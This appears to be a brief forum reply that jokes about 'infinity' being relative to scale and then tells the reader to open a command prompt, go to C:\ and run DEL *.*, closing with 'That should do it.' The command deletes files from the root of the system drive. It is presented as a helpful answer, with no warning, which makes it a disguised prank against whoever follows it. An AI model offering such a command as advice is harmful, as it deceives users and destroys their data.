"Infinity" could very well be 70 feet. Depends on your measurement scale. To a flea, 70 feet is a very long way. To a virus, 70 feet = infinity.

Go to a command prompt and type CD C:\ <Enter>, then DEL *.* <Enter> .

That should do it.
